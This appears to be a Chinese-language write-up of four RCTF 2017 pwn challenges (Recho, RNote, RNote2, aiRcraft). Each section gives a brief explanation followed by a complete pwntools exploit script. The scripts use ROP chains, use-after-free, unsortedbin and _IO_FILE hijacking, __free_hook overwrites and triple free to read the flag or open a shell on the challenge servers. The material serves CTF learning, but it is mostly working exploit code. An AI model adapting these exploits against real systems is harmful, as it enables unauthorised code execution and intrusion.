[关闭]
@SmashStack 2017-06-16T08:11:36.000000Z 字数 17341 阅读 37

RCTF 2017 Pwn WriteUp

CTF


Recho

通过关闭 socket 的 write fd 退出循环,然后就是常规的 ROP 读 flag。

  1. #!/usr/bin/env python
  2. # coding=utf-8
  3. from pwn import *
  4. from pwnlib.log import *
  5. import time
  6. port = 9527
  7. service = 'Recho'
  8. timeout = 30
  9. author = "SmashStack"
  10. def output(name, data):
  11. info(name + ': %#x', data)
  12. def exploit(ip):
  13. #r = process('./Recho') #, env = {'LD_PRELOAD' : '/home/izhuer/Downloads/out/lib/x86_64-linux-gnu/libc-2.19.so'} )#, aslr = False)
  14. #pid = r.proc.pid
  15. r = remote(ip, port)
  16. #os.system('/home/izhuer/Documents/Python\ Script/filter.py 9527 Recho &')
  17. #time.sleep(1)
  18. #r = remote('localhost', port)
  19. #r.recvuntil('Pid of subprocess: ')
  20. #pid = int(r.recvline().strip())
  21. e = ELF('./Recho')
  22. context.log_level = 'debug'
  23. context.terminal = ['tmux', 'splitw', '-h']
  24. script = """
  25. b *0x400834
  26. c
  27. """
  28. #gdb.attach(pid, gdbscript = script)
  29. ###################### exp starts here #####################
  30. start_flag = 'Welcome to Recho server!\n'
  31. r.recvuntil(start_flag)
  32. pop_rdi = 0x00000000004008a3 # pop rdi ; ret
  33. pop_rsi = 0x00000000004008a1 # pop rsi ; pop r15 ; ret
  34. pop_rdx = 0x00000000004006fe # pop rdx ; ret
  35. pop_rax = 0x00000000004006fc # pop rax ; ret
  36. add_gadget = 0x000000000040070d # add byte ptr [rdi], al ; ret
  37. #payload = 'z' * (0x38 + 0xc)
  38. payload = 'z' * 0x38
  39. payload += p64(pop_rdi) + p64(e.got['read'])
  40. payload += p64(pop_rax) + p64(0xe0)
  41. payload += p64(add_gadget)
  42. payload += p64(pop_rdi) + p64(e.got['read'] + 1)
  43. payload += p64(pop_rax) + p64(0xfe)
  44. payload += p64(add_gadget)
  45. payload += p64(pop_rdi) + p64(e.symbols['flag'])
  46. payload += p64(pop_rsi) + p64(0x0) * 2
  47. payload += p64(e.symbols['read'])
  48. payload += p64(pop_rdi) + p64(e.got['read'])
  49. payload += p64(pop_rax) + p64(0x20)
  50. payload += p64(add_gadget)
  51. payload += p64(pop_rdi) + p64(e.got['read'] + 1)
  52. payload += p64(pop_rax) + p64(0x02)
  53. payload += p64(add_gadget)
  54. payload += p64(pop_rdi) + p64(0x3)
  55. payload += p64(pop_rsi) + p64(e.symbols['flag']) * 2
  56. payload += p64(pop_rdx) + p64(0x40)
  57. payload += p64(e.symbols['read'])
  58. payload += p64(pop_rdi) + p64(0x1)
  59. payload += p64(pop_rsi) + p64(e.symbols['flag']) * 2
  60. payload += p64(pop_rdx) + p64(0x40)
  61. payload += p64(e.symbols['write'])
  62. payload += p64(e.symbols['main'])
  63. r.sendline(str(len(payload)))
  64. r.send(payload)
  65. r.shutdown('write')
  66. data = r.recv()
  67. print data
  68. r.interactive()
  69. # r.sendline('ShutDown The BackDoor!')
  70. ######################### exp ends #########################
  71. if __name__ == "__main__":
  72. exploit('recho.2017.teamrois.cn')

RNote

溢出一字节造成 UAF,出题人的本意应该是想寻找合适的 size 伪造 fastbin,然后写栈。不过这里利用了 unsortedbin attack 和 __IO_FILE 劫持控制流回避了寻找 size 的过程。

  1. #!/usr/bin/env python
  2. # coding=utf-8
  3. from pwn import *
  4. from pwnlib.log import *
  5. import time
  6. port = 7777
  7. service = 'RNote'
  8. timeout = 30
  9. author = "SmashStack"
  10. def output(name, data):
  11. info(name + ': %#x', data)
  12. def exploit(ip):
  13. # r = process('./RNote', env = {'LD_PRELOAD' : '/home/izhuer/Documents/CTF/RCTF/RNote/libc.so.6'} )#, aslr = False)
  14. # pid = r.proc.pid
  15. r = remote(ip, port)
  16. # os.system('/home/izhuer/Documents/Python\ Script/filter.py 7777 RNote &')
  17. # time.sleep(1)
  18. # r = remote('localhost', port)
  19. # r.recvuntil('Pid of subprocess: ')
  20. # pid = int(r.recvline().strip())
  21. e = ELF('./RNote')
  22. libc = ELF('./libc.so.6')
  23. # context.log_level = 'debug'
  24. context.terminal = ['tmux', 'splitw', '-h']
  25. script = """
  26. b *0x400eb5
  27. p 0x6020e0
  28. c
  29. """
  30. ###################### exp starts here #####################
  31. interactive_flag = 'Your choice: '
  32. payload = ''
  33. r.sendlineafter(interactive_flag, '1')
  34. r.sendlineafter('Please input the note size: ', str(0x20))
  35. r.sendafter('Please input the title: ', '0' * 0x10 + '\x50')
  36. r.sendafter('Please input the content: ', payload.ljust(0x20, '\x00'))
  37. payload = p64(0) # pre_size
  38. payload += p64(0xd1) # size
  39. r.sendlineafter(interactive_flag, '1')
  40. r.sendlineafter('Please input the note size: ', str(0x20))
  41. r.sendafter('Please input the title: ', '1' * 0xf + '\n')
  42. r.sendafter('Please input the content: ', payload.ljust(0x20, '\x00'))
  43. payload = ''
  44. r.sendlineafter(interactive_flag, '1')
  45. r.sendlineafter('Please input the note size: ', str(0xa0))
  46. r.sendafter('Please input the title: ', '2' * 0xf + '\n')
  47. r.sendafter('Please input the content: ', payload.ljust(0xa0, '\x00'))
  48. r.sendlineafter(interactive_flag, '1')
  49. r.sendlineafter('Please input the note size: ', str(0x50))
  50. r.sendafter('Please input the title: ', '3' * 0xf + '\n')
  51. r.sendafter('Please input the content: ', payload.ljust(0x50, '\x00'))
  52. r.sendlineafter(interactive_flag, '2')
  53. r.sendlineafter('Which Note do you want to delete:', '0')
  54. r.sendlineafter(interactive_flag, '3')
  55. r.sendlineafter('Which Note do you want to show: ', '1')
  56. r.recvuntil(p64(0) + p64(0xd1))
  57. libc_base = u64(r.recv(8)) - 0x3c3b78
  58. output('libc_base', libc_base)
  59. io_list_all_addr = libc_base + libc.symbols['_IO_list_all']
  60. output('io_list_all_addr', io_list_all_addr)
  61. system_addr = libc_base + libc.symbols['system']
  62. output('system_addr', system_addr)
  63. # leak libc base
  64. payload = '\x00' * 0x18 + p64(0xb1)
  65. payload += p64(system_addr) * 0x13
  66. r.sendlineafter(interactive_flag, '1')
  67. r.sendlineafter('Please input the note size: ', str(0xc0))
  68. r.sendafter('Please input the title: ', '0' * 0xf + '\n')
  69. r.sendafter('Please input the content: ', payload.ljust(0xc0, '\x00'))
  70. # initialize heap
  71. # NOW! FUCK YOUR FUCKING SIZE! I WILL BYPASS SUCH A SHIT RESTRICTION WITHOUT USING FASTBIN!!!
  72. payload = ''
  73. r.sendlineafter(interactive_flag, '1')
  74. r.sendlineafter('Please input the note size: ', str(0x20))
  75. r.sendafter('Please input the title: ', '4' * 0x10 + '\xc0')
  76. r.sendafter('Please input the content: ', payload.ljust(0x20, '\x00'))
  77. payload = p64(0)
  78. payload += p64(0xf1)
  79. r.sendlineafter(interactive_flag, '1')
  80. r.sendlineafter('Please input the note size: ', str(0x70))
  81. r.sendafter('Please input the title: ', '5' * 0xf + '\n')
  82. r.sendafter('Please input the content: ', payload.ljust(0x70, '\x00'))
  83. payload = ''
  84. r.sendlineafter(interactive_flag, '1')
  85. r.sendlineafter('Please input the note size: ', str(0x70))
  86. r.sendafter('Please input the title: ', '6' * 0xf + '\n')
  87. r.sendafter('Please input the content: ', payload.ljust(0x70, '\x00'))
  88. payload = ''
  89. r.sendlineafter(interactive_flag, '1')
  90. r.sendlineafter('Please input the note size: ', str(0x70))
  91. r.sendafter('Please input the title: ', '7' * 0xf + '\n')
  92. r.sendafter('Please input the content: ', payload.ljust(0x70, '\x00'))
  93. r.sendlineafter(interactive_flag, '3')
  94. r.sendlineafter('Which Note do you want to show: ', '4')
  95. r.recvuntil('4' * 0x10)
  96. heap_base = u64(r.recv(4).ljust(8, '\x00')) - 0x1c0
  97. output('heap_base', heap_base)
  98. # leak heap base
  99. r.sendlineafter(interactive_flag, '2')
  100. r.sendlineafter('Which Note do you want to delete:', '4')
  101. r.sendlineafter(interactive_flag, '2')
  102. r.sendlineafter('Which Note do you want to delete:', '5')
  103. payload = '/bin/sh'.ljust(8, '\x00') + p64(0x60) + p64(io_list_all_addr - 0x10) * 2 + p64(heap_base) + p64(heap_base + 0x8)
  104. r.sendlineafter(interactive_flag, '1')
  105. r.sendlineafter('Please input the note size: ', str(0x70))
  106. r.sendafter('Please input the title: ', '5' * 0xf + '\n')
  107. r.sendafter('Please input the content: ', payload.ljust(0x70, '\x00'))
  108. r.sendlineafter(interactive_flag, '2')
  109. r.sendlineafter('Which Note do you want to delete:', '6')
  110. payload = '\x00' * 0x58 + p64(heap_base + 0x70)
  111. r.sendlineafter(interactive_flag, '1')
  112. r.sendlineafter('Please input the note size: ', str(0x70))
  113. r.sendafter('Please input the title: ', '6' * 0xf + '\n')
  114. r.sendafter('Please input the content: ', payload.ljust(0x70, '\x00'))
  115. r.sendlineafter(interactive_flag, '1')
  116. r.sendlineafter('Please input the note size: ', str(0x100))
  117. # gdb.attach(pid, gdbscript = script)
  118. r.interactive()
  119. # r.sendline('ShutDown The BackDoor!')
  120. ######################### exp ends #########################
  121. if __name__ == "__main__":
  122. exploit('rnote.2017.teamrois.cn')

RNote2

strncat 造成溢出,overlap 以后修改 __free_hook 为 one_gadget

  1. #!/usr/bin/env python
  2. # coding=utf-8
  3. from pwn import *
  4. from pwnlib.log import *
  5. import time
  6. port = 6666
  7. service = 'RNote2'
  8. timeout = 30
  9. author = "SmashStack"
  10. def output(name, data):
  11. info(name + ': %#x', data)
  12. def exploit(ip):
  13. # r = process('./RNote2')
  14. # r = process('./RNote2', env = {'LD_PRELOAD' : '/home/izhuer/Documents/CTF/RCTF/RNote2/libc.so.6'}, aslr = False)
  15. # pid = r.proc.pid
  16. r = remote(ip, port)
  17. # os.system('/home/izhuer/Documents/Python\ Script/filter.py 6666 RNote2 &')
  18. # time.sleep(1)
  19. # r = remote('localhost', port)
  20. # r.recvuntil('Pid of subprocess: ')
  21. # pid = int(r.recvline().strip())
  22. e = ELF('./RNote2')
  23. libc = ELF('/home/izhuer/Documents/CTF/RCTF/RNote2/libc.so.6')
  24. # context.log_level = 'debug'
  25. context.terminal = ['tmux', 'splitw', '-h']
  26. script = """
  27. b *0x555555554f1d
  28. b *0x5555555551c2
  29. c
  30. """
  31. ###################### exp starts here #####################
  32. interactive_flag = 'Your choice:\n'
  33. r.sendlineafter(interactive_flag, '1');
  34. r.sendlineafter('Input the note length:\n', str(0x100))
  35. r.sendlineafter('Input the note content:\n', '')
  36. r.sendlineafter(interactive_flag, '1');
  37. r.sendlineafter('Input the note length:\n', '1')
  38. r.sendlineafter('Input the note content:\n', '')
  39. r.sendlineafter(interactive_flag, '2')
  40. r.sendlineafter('Which note do you want to delete?\n', '1')
  41. r.sendlineafter(interactive_flag, '2')
  42. r.sendlineafter('Which note do you want to delete?\n', '1')
  43. r.sendlineafter(interactive_flag, '1');
  44. r.sendlineafter('Input the note length:\n', str(0x100))
  45. r.sendlineafter('Input the note content:\n', '')
  46. r.sendlineafter(interactive_flag, '3');
  47. r.recvuntil('Note content: ')
  48. libc_base = u64(r.recv(6).ljust(8, '\x00')) - 0x3c3b0a
  49. output('libc_base', libc_base)
  50. r.sendlineafter(interactive_flag, '2')
  51. r.sendlineafter('Which note do you want to delete?\n', '1')
  52. # Leak libc
  53. r.sendlineafter(interactive_flag, '1');
  54. r.sendlineafter('Input the note length:\n', '1')
  55. r.sendlineafter('Input the note content:\n', '')
  56. r.sendlineafter(interactive_flag, '1');
  57. r.sendlineafter('Input the note length:\n', '1')
  58. r.sendlineafter('Input the note content:\n', '')
  59. r.sendlineafter(interactive_flag, '2')
  60. r.sendlineafter('Which note do you want to delete?\n', '1')
  61. r.sendlineafter(interactive_flag, '2')
  62. r.sendlineafter('Which note do you want to delete?\n', '1')
  63. r.sendlineafter(interactive_flag, '1');
  64. r.sendlineafter('Input the note length:\n', '1')
  65. r.sendlineafter('Input the note content:\n', '')
  66. r.sendlineafter(interactive_flag, '3');
  67. r.recvuntil('Note content: ')
  68. heap_base = u64(r.recv(6).ljust(8, '\x00')) - 0xa
  69. output('heap_base', heap_base)
  70. r.sendlineafter(interactive_flag, '2')
  71. r.sendlineafter('Which note do you want to delete?\n', '1')
  72. # Leak heap base
  73. r.sendlineafter(interactive_flag, '1');
  74. r.sendlineafter('Input the note length:\n', str(0x18))
  75. r.sendlineafter('Input the note content:\n', 'z' * 0x17)
  76. r.sendlineafter(interactive_flag, '1');
  77. r.sendlineafter('Input the note length:\n', str(0x18))
  78. r.sendlineafter('Input the note content:\n', 'x' * 0x17)
  79. r.sendlineafter(interactive_flag, '1');
  80. r.sendlineafter('Input the note length:\n', str(0x18))
  81. r.sendlineafter('Input the note content:\n', 'y' * 0x17)
  82. r.sendlineafter(interactive_flag, '2')
  83. r.sendlineafter('Which note do you want to delete?\n', '2')
  84. r.sendlineafter(interactive_flag, '1');
  85. r.sendlineafter('Input the note length:\n', str(0x100))
  86. r.sendlineafter('Input the note content:\n', '')
  87. r.sendlineafter(interactive_flag, '1');
  88. r.sendlineafter('Input the note length:\n', str(0x100))
  89. r.sendlineafter('Input the note content:\n', '')
  90. r.sendlineafter(interactive_flag, '2')
  91. r.sendlineafter('Which note do you want to delete?\n', '3')
  92. r.sendlineafter(interactive_flag, '2')
  93. r.sendlineafter('Which note do you want to delete?\n', '3')
  94. # Initial the heap
  95. r.sendlineafter(interactive_flag, '2')
  96. r.sendlineafter('Which note do you want to delete?\n', '1')
  97. r.sendlineafter(interactive_flag, '1');
  98. r.sendlineafter('Input the note length:\n', str(0x8))
  99. r.sendafter('Input the note content:\n', 'z' * 0x8)
  100. r.sendlineafter(interactive_flag, '1');
  101. r.sendlineafter('Input the note length:\n', str(0xa0))
  102. r.sendafter('Input the note content:\n', '1' * 0xa0)
  103. r.sendlineafter(interactive_flag, '1');
  104. r.sendlineafter('Input the note length:\n', str(0x20))
  105. r.sendafter('Input the note content:\n', '2' * 0x20)
  106. r.sendlineafter(interactive_flag, '5')
  107. r.sendlineafter('Which note do you want to expand?\n', '2')
  108. r.sendlineafter('How long do you want to expand?\n', str(0x2))
  109. r.sendlineafter('Input content you want to expand\n', '\x01' * 0x1)
  110. r.sendlineafter(interactive_flag, '2')
  111. r.sendlineafter('Which note do you want to delete?\n', '1')
  112. # overlap
  113. # 1:y 2:z 3:1 4:2
  114. payload = '\x00' * 0x18
  115. payload += p64(0x31) # size
  116. payload += p64(0) # edited
  117. payload += p64(0x8) # notelen
  118. payload += p64(0) # next
  119. payload += p64(0) # last
  120. payload += p64(libc_base + libc.symbols['__free_hook'])
  121. payload += p64(libc_base + 0x18c177) * 0x10
  122. output('bin_sh', libc_base + 0x18c177)
  123. output('free_hook', libc_base + libc.symbols['__free_hook'])
  124. r.sendlineafter(interactive_flag, '1');
  125. r.sendlineafter('Input the note length:\n', str(0xf0))
  126. r.sendlineafter('Input the note content:\n', payload)
  127. # fake a note
  128. r.sendlineafter(interactive_flag, '4')
  129. r.sendlineafter('Which note do you want to edit?\n', '2')
  130. r.sendafter('Input new content:\n', p64(libc_base + 0x4526a))
  131. output('one_gadget', libc_base + 0x4526a)
  132. # make free_hook to one_gadget
  133. r.sendlineafter(interactive_flag, '2')
  134. r.sendlineafter('Which note do you want to delete?\n', '1')
  135. # gdb.attach(pid, gdbscript = script)
  136. r.interactive()
  137. # r.sendline('ShutDown The BackDoor!')
  138. ######################### exp ends #########################
  139. if __name__ == "__main__":
  140. exploit('rnote2.2017.teamrois.cn')

aiRcraft

airport 的 UAF (出题人很喜欢 UAF 呀23333),利用 fly 泄漏地址信息以后 triple free 改函数指针为 system。

  1. #!/usr/bin/env python
  2. # coding=utf-8
  3. from pwn import *
  4. from pwnlib.log import *
  5. import time
  6. port = 9731
  7. service = 'aiRcraft'
  8. timeout = 30
  9. author = "SmashStack"
  10. def output(name, data):
  11. info(name + ': %#x', data)
  12. def exploit(ip):
  13. # r = process('./aiRcraft', aslr = False)
  14. # pid = r.proc.pid
  15. r = remote(ip, port)
  16. # os.system('/home/izhuer/Documents/Python\ Script/filter.py 9731 aiRcraft &')
  17. # time.sleep(1)
  18. # r = remote('localhost', port)
  19. # r.recvuntil('Pid of subprocess: ')
  20. # pid = int(r.recvline().strip())
  21. e = ELF('./aiRcraft')
  22. libc = ELF('./libc.so.6')
  23. # context.log_level = 'debug'
  24. context.terminal = ['tmux', 'splitw', '-h']
  25. script = """
  26. b *0x5555555553f4
  27. p 0x555555756080
  28. p 0x555555756100
  29. c
  30. """
  31. ###################### exp starts here #####################
  32. interactive_flag = 'Your choice: '
  33. r.sendlineafter(interactive_flag, '1')
  34. r.sendlineafter(interactive_flag, '1')
  35. r.sendlineafter('Input the plane\'s name: ', 'plane0')
  36. r.sendlineafter(interactive_flag, '4')
  37. r.sendlineafter('Which plane do you want to choose? ', 'plane0')
  38. r.sendlineafter(interactive_flag, '2')
  39. # leave a chunk for plane
  40. r.sendlineafter(interactive_flag, '2')
  41. r.sendlineafter('How long is the airport\'s name? ', str(0x10))
  42. r.sendafter('Please input the name: ', '0' * 0x10)
  43. r.sendlineafter(interactive_flag, '2')
  44. r.sendlineafter('How long is the airport\'s name? ', str(0x10))
  45. r.sendafter('Please input the name: ', '1' * 0x10)
  46. # make two airport
  47. r.sendlineafter(interactive_flag, '3')
  48. r.sendlineafter('Which airport do you want to choose? ', '0')
  49. r.sendlineafter(interactive_flag, '2')
  50. r.sendlineafter(interactive_flag, '3')
  51. r.sendlineafter('Which airport do you want to choose? ', '1')
  52. r.sendlineafter(interactive_flag, '2')
  53. # free these two airport to triger UAF
  54. r.sendlineafter(interactive_flag, '1')
  55. r.sendlineafter(interactive_flag, '1')
  56. r.sendlineafter('Input the plane\'s name: ', 'plane0')
  57. r.sendlineafter(interactive_flag, '4')
  58. r.sendlineafter('Which plane do you want to choose? ', 'plane0')
  59. r.sendlineafter(interactive_flag, '1')
  60. r.sendlineafter('which airport do you want to fly? ', '1')
  61. r.recvuntil('plane0 to ')
  62. pie_base = u64(r.recv(6).ljust(8, '\x00')) - 0xb7d
  63. output('pie_base', pie_base)
  64. r.sendlineafter(interactive_flag, '3')
  65. # leak pie addr by chance
  66. r.sendlineafter(interactive_flag, '4')
  67. r.sendlineafter('Which plane do you want to choose? ', 'plane0')
  68. r.sendlineafter(interactive_flag, '1')
  69. r.sendlineafter('which airport do you want to fly? ', '0')
  70. r.recvuntil('plane0 to ')
  71. heap_base = u64(r.recv(6).ljust(8, '\x00')) - 0x1b0
  72. output('heap_base', heap_base)
  73. r.sendlineafter(interactive_flag, '3')
  74. # leak heap addr
  75. r.sendlineafter(interactive_flag, '2')
  76. r.sendlineafter('How long is the airport\'s name? ', str(0x100))
  77. r.sendafter('Please input the name: ', '2' * 0x100)
  78. # put the freed chunk into smallbin
  79. r.sendlineafter(interactive_flag, '4')
  80. r.sendlineafter('Which plane do you want to choose? ', 'plane0')
  81. r.sendlineafter(interactive_flag, '1')
  82. r.sendlineafter('which airport do you want to fly? ', '1')
  83. r.recvuntil('plane0 to ')
  84. libc_base = u64(r.recv(6).ljust(8, '\x00')) - 0x3c3be8
  85. output('libc_base', libc_base)
  86. r.sendlineafter(interactive_flag, '3')
  87. # leak libc base
  88. # Until now, the airplane 0 1 is freed and 2 is occupied
  89. r.sendlineafter(interactive_flag, '3')
  90. r.sendlineafter('Which airport do you want to choose? ', '2')
  91. r.sendlineafter(interactive_flag, '2')
  92. # free airplane 2 to leave free chunk for the old 0
  93. payload = ''
  94. payload += p64(libc_base + libc.symbols['environ'])
  95. payload += p64(heap_base + 0x370)
  96. payload += p64(heap_base + 0x370 - 0x50)
  97. payload += p64(heap_base + 0x370)
  98. r.sendlineafter(interactive_flag, '2')
  99. r.sendlineafter('How long is the airport\'s name? ', str(0x88))
  100. r.sendafter('Please input the name: ', payload.ljust(0x88, '\00'))
  101. # UAF to fake an airport
  102. for i in xrange(1, 4):
  103. r.sendlineafter(interactive_flag, '1')
  104. r.sendlineafter(interactive_flag, '1')
  105. r.sendlineafter('Input the plane\'s name: ', 'plane%d' % i)
  106. r.sendlineafter(interactive_flag, '4')
  107. r.sendlineafter('Which plane do you want to choose? ', 'plane%d' % i)
  108. r.sendlineafter(interactive_flag, '1')
  109. r.sendlineafter('which airport do you want to fly? ', '1')
  110. r.sendlineafter(interactive_flag, '3')
  111. # Add some plane to trible free
  112. r.sendlineafter(interactive_flag, '3')
  113. r.sendlineafter('Which airport do you want to choose? ', '0')
  114. r.sendlineafter(interactive_flag, '2')
  115. # triger triple free
  116. r.sendlineafter(interactive_flag, '1')
  117. r.sendlineafter(interactive_flag, '1')
  118. r.sendlineafter('Input the plane\'s name: ', '/bin/sh\x00')
  119. r.sendlineafter(interactive_flag, '1')
  120. r.sendlineafter(interactive_flag, '1')
  121. r.sendlineafter('Input the plane\'s name: ', 'zzdawang')
  122. # padding chunk
  123. payload = ''
  124. payload += '/bin/sh'.ljust(32, '\00') # name
  125. payload += p64(0) # company
  126. payload += p64(0) # airport
  127. payload += p64(heap_base) # last
  128. payload += p64(0) # next
  129. payload += p64(libc_base + libc.symbols['system'])
  130. r.sendlineafter(interactive_flag, '2')
  131. r.sendlineafter('How long is the airport\'s name? ', str(0x48))
  132. r.sendafter('Please input the name: ', payload.ljust(0x48, '\x00'))
  133. # fake plane /bin/sh
  134. r.sendlineafter(interactive_flag, '4')
  135. r.sendlineafter('Which plane do you want to choose? ', '/bin/sh')
  136. r.sendlineafter(interactive_flag, '2')
  137. #gdb.attach(pid, gdbscript = script)
  138. r.interactive()
  139. # r.sendline('ShutDown The BackDoor!')
  140. ######################### exp ends #########################
  141. #r.sendlineafter(interactive_flag, '1')
  142. #r.sendlineafter(interactive_flag, '1')
  143. #r.sendlineafter('Input the plane\'s name: ', 'plane%d' % i)
  144. #r.sendlineafter(interactive_flag, '4')
  145. #r.sendlineafter('Which plane do you want to choose? ', 'plane%d' % i)
  146. #r.sendlineafter(interactive_flag, '1')
  147. #r.sendlineafter('which airport do you want to fly? ', '1')
  148. #r.sendlineafter(interactive_flag, '3')
  149. #r.sendlineafter(interactive_flag, '4')
  150. #r.sendlineafter('Which plane do you want to choose? ', 'plane2')
  151. #r.sendlineafter(interactive_flag, '2')
  152. if __name__ == "__main__":
  153. exploit('aircraft.2017.teamrois.cn')
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注